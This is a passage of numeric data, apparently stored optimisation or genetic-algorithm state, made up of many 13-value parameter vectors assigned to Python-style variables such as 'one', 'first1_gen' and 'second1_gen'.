130195065921.46504]\n[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13,\n 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, \n 132029509845.4832]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15,\n 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, \n 137741348069.72827]\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, \n 143862344272.2216]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, \n 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, \n 151496866956.06183]\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, \n 154679332976.7693]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, \n 4.9793760275117476e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, \n -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10,\n 101036412554.48618, 178952195751.12357]\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10,\n 101115281125.52821, 181312381109.07834]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15,\n 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, \n -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, \n 193403737351.61066]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06,\n -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, \n 199093039398.6542]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, \n 120593643708.66519]\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, \n 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, \n 121269083493.68436]\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, \n -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16,\n 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, \n 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, \n 122027384226.92]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15,\n 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -\n 1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, \n 122750625888.09634]\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, \n 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, \n 122935226427.98189]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, \n 131702579310.68652]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, \n 133211383937.09729]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, \n 143105235055.608]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, \n 143860615432.91934]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, \n 145092770865.8836]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, \n 155477031697.76462]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, \n 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, \n 158587944243.89005]\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, \n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, \n 180430143233.58368]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15,\n 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, \n 183449646874.34637]\n[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, \n 191076754457.2524]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, \n -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, \n 194275355409.06598]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11,\n -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08,\n 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, \n 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, \n 198112832281.90573]\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, \n 115813093887.0164]\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06,\n -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, \n 118508631814.89664]\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, \n 119478476003.54858]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, \n 119746195767.88297]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, \n 120002114057.9749]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, \n 124495463707.0261]\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, \n 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, \n 127226107362.62663]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, \n 128048566261.66084]\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, \n 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, \n 129146670219.88675]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, \n 132556338910.10567]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, \n 132653030892.18918]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, \n 140436120253.29218]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, \n 143105235055.60883]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, \n 143860615432.91846]\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, \n 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, \n 144269444777.14786]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, \n 145085114899.6645]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15,\n 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, \n 145085114900.12366]\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, \n 145590447784.79443]\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, \n 153694065180.84283]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, \n 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, \n 154263245256.49524]\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, \n 164710456294.5225]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, \n 170174200265.44513]\n",
"step-3": "one = [7.236287049225701e-06, -1.445911565527231e-12, -\n 1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10,\n -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, \n -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10,\n 135323228000.64511, 130464457208.5385]\ntwo = [6.101651991514008e-06, -1.2764740103418866e-12, -\n 1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, \n -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05,\n -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10,\n 194360719320.3122, 75684271432.82758]\nthree = [6.4442734160126695e-06, -1.2463732938819767e-12, -\n 1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, \n -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, \n -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, \n 40874176708.45886, 129961018217.7445]\nfour = [5.591985036569838e-06, -1.5732644861037622e-12, -\n 1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, \n -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, \n -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10,\n 95538034865.65512, 192689393537.75766]\nfive = [5.9877501684316964e-06, -1.4725222964411265e-12, -\n 2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, \n -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, \n -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10,\n 172629547544.72174, 121012464101.10771]\nsix = [6.525636151737385e-10, -1.5516831882387681e-12, -\n 1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10,\n -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497687e-05,\n -1.9757021060346727e-06, -1.5031696163247857e-08, 8.945619840357268e-10,\n 99871865434.22476, 123933224114.80229]\nfirst1_gen = [[6.417695307686038e-06, -1.2416886913890308e-12, -\n 1.791907685050265e-13, 3.983180616117193e-11, -7.243488055496258e-11, -\n 1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, \n -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10,\n 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -\n 1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11,\n -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, \n 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08,\n 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [\n 7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13,\n 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15,\n 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, \n -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, \n 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, \n -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10,\n -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05,\n -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10,\n 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -\n 1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11,\n -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16,\n 2.2287538734129395e-05, -1.8740196054647742e-06, -\n 1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, \n 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -\n 1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10,\n -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05,\n -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10,\n 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -\n 1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, \n -2.5320893657294154e-10, -2.1583737575101563e-15, 3.210132219509301e-16,\n 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08,\n 9.214909160927855e-10, 154168790181.56195, 151975095946.00134], [\n 6.4442734160126695e-06, -1.5732644861037622e-12, -\n 1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -\n 2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, \n -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10,\n 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -\n 1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11,\n -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16,\n 2.7105518268805634e-05, -1.9663482803776534e-06, -\n 1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, \n 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -\n 1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10,\n -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05,\n -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10,\n 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -\n 1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11,\n -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16,\n 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, \n 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [\n 6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13,\n 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15,\n 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, \n -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, \n 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -\n 1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, \n -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, \n -1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, \n 1374938673042.5493, 4524615824537.332], [5.6149092148265474e-06, -\n 1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, \n -2.335516269047763e-10, -2.1416544930348844e-15, 3.3108330528832777e-16,\n 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, \n 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [\n 6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13,\n 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15,\n 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, \n -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, \n 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -\n 2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, \n -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -\n 1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10,\n 3105580314530.341, 4622017117439.275]]\nsecond1_gen = [[6.473615077297489e-06, -1.2416886913890308e-12, -\n 1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, \n -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05,\n -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10,\n 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -\n 1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11,\n -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, \n 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08,\n 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [\n 7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13,\n 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15,\n 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06,\n -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, \n 440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -\n 1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, \n -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05,\n -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, \n 90541420172.20418, 503189560104.03455], [6.417695307686038e-06, -\n 1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11,\n -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16,\n 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08,\n 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [\n 7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13,\n 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15,\n 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06,\n -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, \n 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -\n 1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10,\n -1.1298867172210502e-15, 3.273827033054119e-16, 2.71828464025051e-05, -\n 1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, \n 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -\n 1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11,\n -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16,\n 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, \n 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [\n 5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13,\n 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15,\n 3.2670998922499434e-16, 2.2375793269713536e-05, 